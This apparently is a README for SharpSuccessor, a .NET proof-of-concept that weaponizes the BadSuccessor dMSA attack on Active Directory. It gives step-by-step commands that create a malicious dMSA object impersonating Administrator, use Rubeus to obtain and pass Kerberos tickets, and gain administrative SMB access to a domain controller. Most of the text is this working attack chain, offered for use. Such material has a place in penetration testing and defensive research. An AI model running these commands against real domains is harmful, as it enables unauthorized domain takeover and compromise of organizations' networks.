SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon’s (@YuG0rd) BadSuccessor attack from Akamai. A low privilege user with CreateChild permissions over any Organizational Unit (OU) in the Active Directory domain with write access on a target object can perform account takeover.
Use SharpSuccessor to add and weaponize the dMSA object, as well as write the proper attributes on the target account you wish to impersonate:
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA
Request a TGT as the current user context, in this case jdoe:
Rubeus.exe tgtdeleg /nowrap
Then use that tgt to impersonate the dMSA account:
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....
Now you can request a service ticket with Administrator context for any SPN, including the Domain Controllers for post-exploitation. For example here I will show admin privileges for SMB on the domain controller:
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...
Now that we have the ticket in memory, we can test access:
Massive thanks to Jim Sykora and Garrett Foster for the inspirations and assistance for this tool!